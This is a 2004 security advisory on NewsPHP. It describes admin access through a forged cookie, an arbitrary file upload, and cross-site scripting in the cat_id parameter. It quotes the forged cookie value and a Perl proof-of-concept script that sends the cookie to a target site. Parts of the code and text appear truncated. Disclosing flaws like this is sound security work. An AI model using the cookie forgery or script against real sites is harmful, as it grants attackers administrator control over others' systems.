| NewsPHP Admin Access and Cross Site Scripting Vulnerability
Security-Corporation ID : SC-1007
URL : http://www.security-corporation.com/articles-20040412-001.html
Author : Manuel Lopez <email@example.com>
Product : NewsPHP (All versions)
Source Message Contents :
#Title: XSS, Admin Access via Cookie and File Upload vulnerability in
#Software: NewsPHP (All versions)
#Underlying OS: All
NewsPHP is a perfect solution for creating web publishing system, like
online magazine, newspaper, TV/Radio or news portals. It works also as
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update it.
A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.
A File Upload vulnerability in the Admin panel allow authenticated users
upload arbitrary files instead of a video file.
This product also is vulnerable to the Cross-Site Scripting vulnerability.
The flaw is caused because cookie data is not properly checked for
This is the cookie and POC to gain administrator privileges in newsPHP:
### autorized=admin; root=admin ###
## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
if (@ARGV < 3)
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
$host = $ARGV;
$directorio = $ARGV;
$fichero = $ARGV;
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die
"$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
A remote user can conduct cross-site scripting attacks due to an input
validation flaw in cat_id variable.
#File Upload vulnerability#
An user with privileges can upload executable code instead of a video
Panel. Once the code has been uploaded an user can execute the code by
calling the file, this
will be executed with the privileges of the web server.
There is no solution at the moment.
Vendor contacted Apr 3 2004
Manuel Lopez, firstname.lastname@example.org